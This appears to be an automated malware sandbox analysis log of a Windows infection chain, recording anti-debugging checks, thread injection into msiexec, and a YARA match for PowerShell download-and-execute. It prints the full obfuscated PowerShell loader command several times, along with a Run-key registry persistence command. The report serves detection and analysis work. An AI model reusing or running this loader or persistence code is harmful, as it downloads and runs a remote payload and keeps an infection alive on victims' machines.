                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,13_2_0040DD85
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5486Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4391Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5852Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3984Jump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeAPI coverage: 9.0 %
                Source: C:\Windows\SysWOW64\msiexec.exeAPI coverage: 8.3 %
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5996Thread sleep time: -3689348814741908s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7164Thread sleep time: -4611686018427385s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exe TID: 2292Thread sleep count: 203 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exe TID: 2292Thread sleep time: -101500s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exe TID: 3836Thread sleep count: 3139 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exe TID: 3836Thread sleep time: -9417000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exe TID: 3836Thread sleep count: 6385 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exe TID: 3836Thread sleep time: -19155000s >= -30000sJump to behavior
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_234B10F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,LdrInitializeThunk,FindFirstFileW,FindNextFileW,FindClose,8_2_234B10F1
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_234B6580 LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,FindFirstFileExA,8_2_234B6580
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0040AE51 FindFirstFileW,FindNextFileW,13_2_0040AE51
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,14_2_00407EF8
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,16_2_00407898
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_00418981 memset,GetSystemInfo,13_2_00418981
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
                Source: msiexec.exe, 00000008.00000002.3293007161.0000000007728000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW-
                Source: powershell.exe, 00000002.00000002.2186949286.000002417A68C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2376551918.0000000006F7D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.3293007161.0000000007728000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.3293007161.00000000076D3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: C:\Windows\SysWOW64\msiexec.exeAPI call chain: ExitProcess graph end nodegraph_14-34015
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00B4D6F8 LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,5_2_00B4D6F8
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_234B2639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_234B2639
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,13_2_0040DD85
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW,13_2_004044A4
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_234B4AB4 mov eax, dword ptr fs:[00000030h]8_2_234B4AB4
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_234B724E GetProcessHeap,8_2_234B724E
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_234B2B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_234B2B1C
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_234B2639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_234B2639
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_234B60E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_234B60E2

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Early bird code injection technique detected
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exeJump to behavior
                Yara detected Powershell download and execute
                Source: Yara matchFile source: amsi64_3664.amsi.csv, type: OTHER
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3664, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6504, type: MEMORYSTR
                Maps a DLL or memory area into another process
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: NULL target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: NULL target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: NULL target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and writeJump to behavior
                Queues an APC in another process (thread injection)
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread APC queued: target process: C:\Windows\SysWOW64\msiexec.exeJump to behavior
                Writes to foreign memory regions
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\msiexec.exe base: 4530000Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden " <#Sweetshop Forprogrammere Bevidstlse #>;$Billetkontoret='hovedngles';<#hygroscopically Borgerliggr Torpets Unclassified Blokvognens #>;$Psykes=$sulfate+$host.UI;function Boendes($Motorisere){If ($Psykes) {$Unpictorialised++;}$Aarskiftet=$genindkaldte+$Motorisere.'Length'-$Unpictorialised; for( $Herregaardene131=4;$Herregaardene131 -lt $Aarskiftet;$Herregaardene131+=5){$Pyramidia++;$Foredevote+=$Motorisere[$Herregaardene131];$Riskfulness='Oprejses';}$Foredevote;}function Aromastofs($Oversigtsbilleders173){ & ($Fandangoer) ($Oversigtsbilleders173);}$Kolonialvares=Boendes 'LaggMHjelo D lz dreiUnsilMat lTa fa F e/Forb ';$Kolonialvares+=Boendes 'S ks5Bran. Pr 0Bede Topi(Fl bWK.ldiMadenbeard,uako TomwMarrsVis JerkN UdaT kov oss1Agra0T nn.besk0bio ;Feri .aphWNobbiRumln Feu6Pick4Ansv;Nord Hen xBirk6 Afs4sk d;,oss OffrKrydvDomm:Spr 1Sm g3Uud,1A ti. lmu0Calo) Si Man G askeHjercde.ak ssioUdsm/ Rot2Depo0Verb1Erot0Elec0Spar1,iks0 Kun1Jord PreFYeariRe orShreeS orfOct,oFarax Ri /Supe1Mail3Lap 1Pyxi.Sawn0Tyre ';$Sparebsserne=Boendes ' CoeuR mmSMatlE Br rVo,d-U,faaKon.gBrn.EForsnDolkt kva ';$Cafuso=Boendes 'Cho,hPytot,uttt A dp V,tsSmle:mode/ C,u/St ecLamiaSc irfraneSesue yhrGodsfHjemi KunnDecrdlivre OutrSnek. IderOrbio .av/Mngdv pndn Ko,/Juk T Pr rT,keaW,stuNsker,ackiRes.gDis hSpaaeBem.d PoleCalfr Bas.ProcsHeineTranaAmin ';$Luncher=Boendes 'R ck>Vi,t ';$Fandangoer=Boendes 'HanhIunrueBoniXTemp ';$Ensnarement='Unlabialise167';$Totalisatorers='\Knighting.Pro';Aromastofs (Boendes ' Alg$E phgTinkLBadkOBrugBLayoaIndblBrne:Pr dT BatRBa keIspim N,nmSkumePrigspseutUd ao udfL,rouECu tnpas,ehals=Pala$Decie BebnLaarVCart:Rou,aChilp ampDri.DSikkaF.intAdm.AAn.i+Scud$,atat,wkwoRekttGaleAHardLBasiI Li S .tyAEquiTStosO.chorafstEVoveRSlidSOver ');Aromastofs (Boendes 'Venc$ XylgSlicLCo doVietb Pr.ADe sLPrst:UndepLordo Mi tJordASke sDynasVak.iElemFSheeEBrutRTr noSkitUAlcaS Kon=Folk$ entcTrapaSammfDy eUGuatsRovso ksp.Hu vsInseP ImplCollIRacetJ,ds(Dsl,$ Ug.l Z ru.ypeNFortc RgthN veESbeoRMed ) Soc ');Aromastofs (Boendes ' For[EmbenIsbjEtr ntrun .G nesFredEKaffRFir VLilliWaffc uefEHl np Lono l einasiNNonptKeycmExteA ByonFedeAMi rg ReiESu erkamp]Dis :Infe: ForsTrykEE,orCUnimu S irNontIKluntAtr yFejlpForor FroOAktutplotOH veC ilkOLoupLNonc Svk=Acep Lae[SturNDrage Va TT.le. Sk SMu feSlvecShr uSeleR bevI DdktTriryInwep TchrOverO ooptAizoo usCTargO,ettLLiteTNonpYArbepTyvee O,e]Tros:Tank:.enetKneblsomeS rti1dict2Well ');$Cafuso=$Potassiferous[0];$Kvatorialguineaner=(Boendes 'st.k$Vin GVrngl.toloMo,ebOv yA VoyLCoun:HestU.altn MaiE Ru vPi ta TouNBroke ouis u.gCYanaEStr,NAquaTRedrL NotYMel.=konsn ampeN tuwGuls- A.kOCivibAkkrjConfE Pa c U.dTCcdc SnkeSKekcYUrimsBalatAfdaEFlaaM Ach. osn preE Drat Sk .Wardw ExcEGangBAllecCro lfrisIInteeAnmen UndTmaan ');Aromastofs ($Kvatorialguineaner);Aromastofs (Boendes 'Fors$ RebU SpanAcineamfev MinaTeernRegieJulos onecpheneDecln ButtoverlTilsyUnh.. dsJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "humplers" /t REG_EXPAND_SZ /d "%Frenetic% -windowstyle 1 $Overrankness=(gp -Path 'HKCU:\Software\Procentangivelses\').Mannas;%Frenetic% ($Overrankness)"Jump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\gptotbreetfzdjh"Jump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\qkzzuucgsbxenxwycgm"Jump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\amesvmmzojprqdsctrgxif"Jump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\amesvmmzojprqdsctrgxif"Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "humplers" /t REG_EXPAND_SZ /d "%Frenetic% -windowstyle 1 $Overrankness=(gp -Path 'HKCU:\Software\Procentangivelses\').Mannas;%Frenetic% ($Overrankness)"Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden " <#sweetshop forprogrammere bevidstlse #>;$billetkontoret='hovedngles';<#hygroscopically borgerliggr torpets unclassified blokvognens #>;$psykes=$sulfate+$host.ui;function boendes($motorisere){if ($psykes) {$unpictorialised++;}$aarskiftet=$genindkaldte+$motorisere.'length'-$unpictorialised; for( $herregaardene131=4;$herregaardene131 -lt $aarskiftet;$herregaardene131+=5){$pyramidia++;$foredevote+=$motorisere[$herregaardene131];$riskfulness='oprejses';}$foredevote;}function aromastofs($oversigtsbilleders173){ & ($fandangoer) ($oversigtsbilleders173);}$kolonialvares=boendes 'laggmhjelo d lz dreiunsilmat lta fa f e/forb ';$kolonialvares+=boendes 's ks5bran. pr 0bede topi(fl bwk.ldimadenbeard,uako tomwmarrsvis jerkn udat kov oss1agra0t nn.besk0bio ;feri .aphwnobbirumln feu6pick4ansv;nord hen xbirk6 afs4sk d;,oss offrkrydvdomm:spr 1sm g3uud,1a ti. lmu0calo) si man g askehjercde.ak ssioudsm/ rot2depo0verb1erot0elec0spar1,iks0 kun1jord prefyearire orshrees orfoct,ofarax ri /supe1mail3lap 1pyxi.sawn0tyre ';$sparebsserne=boendes ' coeur mmsmatle br rvo,d-u,faakon.gbrn.eforsndolkt kva ';$cafuso=boendes 'cho,hpytot,uttt a dp v,tssmle:mode/ c,u/st eclamiasc irfranesesue yhrgodsfhjemi kunndecrdlivre outrsnek. iderorbio .av/mngdv pndn ko,/juk t pr rt,keaw,stunsker,ackires.gdis hspaaebem.d polecalfr bas.procsheinetranaamin ';$luncher=boendes 'r ck>vi,t ';$fandangoer=boendes 'hanhiunruebonixtemp ';$ensnarement='unlabialise167';$totalisatorers='\knighting.pro';aromastofs (boendes ' alg$e phgtinklbadkobrugblayoaindblbrne:pr dt batrba keispim n,nmskumeprigspseutud ao udfl,rouecu tnpas,ehals=pala$decie bebnlaarvcart:rou,achilp ampdri.dsikkaf.intadm.aan.i+scud$,atat,wkworekttgaleahardlbasii li s .tyaequitstoso.chorafstevoverslidsover ');aromastofs (boendes 'venc$ xylgsliclco dovietb pr.ade slprst:undeplordo mi tjordaske sdynasvak.ielemfsheeebrutrtr noskitualcas kon=folk$ entctrapasammfdy euguatsrovso ksp.hu vsinsep implcolliracetj,ds(dsl,$ ug.l z ru.ypenfortc rgthn veesbeormed ) soc ');aromastofs (boendes ' for[embenisbjetr ntrun .g nesfredekaffrfir vlilliwaffc uefehl np lono l einasinnonptkeycmextea byonfedeami rg reiesu erkamp]dis :infe: forstrykee,orcunimu s irnontikluntatr yfejlpforor frooaktutplotoh vec ilkolouplnonc svk=acep lae[sturndrage va tt.le. sk smu feslvecshr useler bevi ddkttriryinwep tchrovero ooptaizoo usctargo,ettllitetnonpyarbeptyvee o,e]tros:tank:.enetkneblsomes rti1dict2well ');$cafuso=$potassiferous[0];$kvatorialguineaner=(boendes 'st.k$vin gvrngl.tolomo,ebov ya voylcoun:hestu.altn maie ru vpi ta tounbroke ouis u.gcyanaestr,naquatredrl notymel.=konsn ampen tuwguls- a.kocivibakkrjconfe pa c u.dtccdc snkeskekcyurimsbalatafdaeflaam ach. osn pree drat sk .wardw excegangballeccro lfrisiinteeanmen undtmaan ');aromastofs ($kvatorialguineaner);aromastofs (boendes 'fors$ rebu spanacineamfev minateernregiejulos onecphenedecln buttoverltilsyunh.. ds
                Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" " <#sweetshop forprogrammere bevidstlse #>;$billetkontoret='hovedngles';<#hygroscopically borgerliggr torpets unclassified blokvognens #>;$psykes=$sulfate+$host.ui;function boendes($motorisere){if ($psykes) {$unpictorialised++;}$aarskiftet=$genindkaldte+$motorisere.'length'-$unpictorialised; for( $herregaardene131=4;$herregaardene131 -lt $aarskiftet;$herregaardene131+=5){$pyramidia++;$foredevote+=$motorisere[$herregaardene131];$riskfulness='oprejses';}$foredevote;}function aromastofs($oversigtsbilleders173){ & ($fandangoer) ($oversigtsbilleders173);}$kolonialvares=boendes 'laggmhjelo d lz dreiunsilmat lta fa f e/forb ';$kolonialvares+=boendes 's ks5bran. pr 0bede topi(fl bwk.ldimadenbeard,uako tomwmarrsvis jerkn udat kov oss1agra0t nn.besk0bio ;feri .aphwnobbirumln feu6pick4ansv;nord hen xbirk6 afs4sk d;,oss offrkrydvdomm:spr 1sm g3uud,1a ti. lmu0calo) si man g askehjercde.ak ssioudsm/ rot2depo0verb1erot0elec0spar1,iks0 kun1jord prefyearire orshrees orfoct,ofarax ri /supe1mail3lap 1pyxi.sawn0tyre ';$sparebsserne=boendes ' coeur mmsmatle br rvo,d-u,faakon.gbrn.eforsndolkt kva ';$cafuso=boendes 'cho,hpytot,uttt a dp v,tssmle:mode/ c,u/st eclamiasc irfranesesue yhrgodsfhjemi kunndecrdlivre outrsnek. iderorbio .av/mngdv pndn ko,/juk t pr rt,keaw,stunsker,ackires.gdis hspaaebem.d polecalfr bas.procsheinetranaamin ';$luncher=boendes 'r ck>vi,t ';$fandangoer=boendes 'hanhiunruebonixtemp ';$ensnarement='unlabialise167';$totalisatorers='\knighting.pro';aromastofs (boendes ' alg$e phgtinklbadkobrugblayoaindblbrne:pr dt batrba keispim n,nmskumeprigspseutud ao udfl,rouecu tnpas,ehals=pala$decie bebnlaarvcart:rou,achilp ampdri.dsikkaf.intadm.aan.i+scud$,atat,wkworekttgaleahardlbasii li s .tyaequitstoso.chorafstevoverslidsover ');aromastofs (boendes 'venc$ xylgsliclco dovietb pr.ade slprst:undeplordo mi tjordaske sdynasvak.ielemfsheeebrutrtr noskitualcas kon=folk$ entctrapasammfdy euguatsrovso ksp.hu vsinsep implcolliracetj,ds(dsl,$ ug.l z ru.ypenfortc rgthn veesbeormed ) soc ');aromastofs (boendes ' for[embenisbjetr ntrun .g nesfredekaffrfir vlilliwaffc uefehl np lono l einasinnonptkeycmextea byonfedeami rg reiesu erkamp]dis :infe: forstrykee,orcunimu s irnontikluntatr yfejlpforor frooaktutplotoh vec ilkolouplnonc svk=acep lae[sturndrage va tt.le. sk smu feslvecshr useler bevi ddkttriryinwep tchrovero ooptaizoo usctargo,ettllitetnonpyarbeptyvee o,e]tros:tank:.enetkneblsomes rti1dict2well ');$cafuso=$potassiferous[0];$kvatorialguineaner=(boendes 'st.k$vin gvrngl.tolomo,ebov ya voylcoun:hestu.altn maie ru vpi ta tounbroke ouis u.gcyanaestr,naquatredrl notymel.=konsn ampen tuwguls- a.kocivibakkrjconfe pa c u.dtccdc snkeskekcyurimsbalatafdaeflaam ach. osn pree drat sk .wardw excegangballeccro lfrisiinteeanmen undtmaan ');aromastofs ($kvatorialguineaner);aromastofs (boendes 'fors$ rebu spanacineamfev minateernregiejulos onecphenedecl
                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c reg add hkcu\software\microsoft\windows\currentversion\run /f /v "humplers" /t reg_expand_sz /d "%frenetic% -windowstyle 1 $overrankness=(gp -path 'hkcu:\software\procentangivelses\').mannas;%frenetic% ($overrankness)"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden " <#sweetshop forprogrammere bevidstlse #>;$billetkontoret='hovedngles';<#hygroscopically borgerliggr torpets unclassified blokvognens #>;$psykes=$sulfate+$host.ui;function boendes($motorisere){if ($psykes) {$unpictorialised++;}$aarskiftet=$genindkaldte+$motorisere.'length'-$unpictorialised; for( $herregaardene131=4;$herregaardene131 -lt $aarskiftet;$herregaardene131+=5){$pyramidia++;$foredevote+=$motorisere[$herregaardene131];$riskfulness='oprejses';}$foredevote;}function aromastofs($oversigtsbilleders173){ & ($fandangoer) ($oversigtsbilleders173);}$kolonialvares=boendes 'laggmhjelo d lz dreiunsilmat lta fa f e/forb ';$kolonialvares+=boendes 's ks5bran. pr 0bede topi(fl bwk.ldimadenbeard,uako tomwmarrsvis jerkn udat kov oss1agra0t nn.besk0bio ;feri .aphwnobbirumln feu6pick4ansv;nord hen xbirk6 afs4sk d;,oss offrkrydvdomm:spr 1sm g3uud,1a ti. lmu0calo) si man g askehjercde.ak ssioudsm/ rot2depo0verb1erot0elec0spar1,iks0 kun1jord prefyearire orshrees orfoct,ofarax ri /supe1mail3lap 1pyxi.sawn0tyre ';$sparebsserne=boendes ' coeur mmsmatle br rvo,d-u,faakon.gbrn.eforsndolkt kva ';$cafuso=boendes 'cho,hpytot,uttt a dp v,tssmle:mode/ c,u/st eclamiasc irfranesesue yhrgodsfhjemi kunndecrdlivre outrsnek. iderorbio .av/mngdv pndn ko,/juk t pr rt,keaw,stunsker,ackires.gdis hspaaebem.d polecalfr bas.procsheinetranaamin ';$luncher=boendes 'r ck>vi,t ';$fandangoer=boendes 'hanhiunruebonixtemp ';$ensnarement='unlabialise167';$totalisatorers='\knighting.pro';aromastofs (boendes ' alg$e phgtinklbadkobrugblayoaindblbrne:pr dt batrba keispim n,nmskumeprigspseutud ao udfl,rouecu tnpas,ehals=pala$decie bebnlaarvcart:rou,achilp ampdri.dsikkaf.intadm.aan.i+scud$,atat,wkworekttgaleahardlbasii li s .tyaequitstoso.chorafstevoverslidsover ');aromastofs (boendes 'venc$ xylgsliclco dovietb pr.ade slprst:undeplordo mi tjordaske sdynasvak.ielemfsheeebrutrtr noskitualcas kon=folk$ entctrapasammfdy euguatsrovso ksp.hu vsinsep implcolliracetj,ds(dsl,$ ug.l z ru.ypenfortc rgthn veesbeormed ) soc ');aromastofs (boendes ' for[embenisbjetr ntrun .g nesfredekaffrfir vlilliwaffc uefehl np lono l einasinnonptkeycmextea byonfedeami rg reiesu erkamp]dis :infe: forstrykee,orcunimu s irnontikluntatr yfejlpforor frooaktutplotoh vec ilkolouplnonc svk=acep lae[sturndrage va tt.le. sk smu feslvecshr useler bevi ddkttriryinwep tchrovero ooptaizoo usctargo,ettllitetnonpyarbeptyvee o,e]tros:tank:.enetkneblsomes rti1dict2well ');$cafuso=$potassiferous[0];$kvatorialguineaner=(boendes 'st.k$vin gvrngl.tolomo,ebov ya voylcoun:hestu.altn maie ru vpi ta tounbroke ouis u.gcyanaestr,naquatredrl notymel.=konsn ampen tuwguls- a.kocivibakkrjconfe pa c u.dtccdc snkeskekcyurimsbalatafdaeflaam ach. osn pree drat sk .wardw excegangballeccro lfrisiinteeanmen undtmaan ');aromastofs ($kvatorialguineaner);aromastofs (boendes 'fors$ rebu spanacineamfev minateernregiejulos onecphenedecln buttoverltilsyunh.. dsJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c reg add hkcu\software\microsoft\windows\currentversion\run /f /v "humplers" /t reg_expand_sz /d "%frenetic% -windowstyle 1 $overrankness=(gp -path 'hkcu:\software\procentangivelses\').mannas;%frenetic% ($overrankness)"Jump to behavior
                Source: msiexec.exe, 00000008.00000003.2592576113.0000000007790000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2592297070.0000000007790000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2590039170.0000000007790000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
                Source: msiexec.exe, 00000008.00000002.3293007161.000000000773B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerB6\;
                Source: msiexec.exe, 00000008.00000002.3293007161.000000000773B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerB6\]
                Source: msiexec.exe, 00000008.00000002.3293007161.000000000773B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerB6\hic ProviderB
                Source: msiexec.exe, 00000008.00000003.2592576113.0000000007790000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2592297070.0000000007790000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2590039170.0000000007790000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerL
                Source: msiexec.exe, 00000008.00000002.3293007161.000000000773B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerNq#T
                Source: msiexec.exe, 00000008.00000003.2592576113.0000000007790000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2627856927.0000000007790000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2592297070.0000000007790000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerW
                Source: msiexec.exe, 00000008.00000002.3293007161.000000000773B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager5|q
                Source: msiexec.exe, 00000008.00000002.3293007161.000000000773B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerB6\
                Source: msiexec.exe, 00000008.00000002.3293007161.000000000773B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerB6\\Mi{#oTo
                Source: msiexec.exe, 00000008.00000002.3293007161.000000000773B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
                Source: msiexec.exe, 00000008.00000002.3293007161.000000000773B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerB6\ypt
                Source: msiexec.exe, 00000008.00000003.2592576113.0000000007790000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2627856927.0000000007790000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2592297070.0000000007790000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [Program Manager]
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_234B2933 cpuid 8_2_234B2933
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
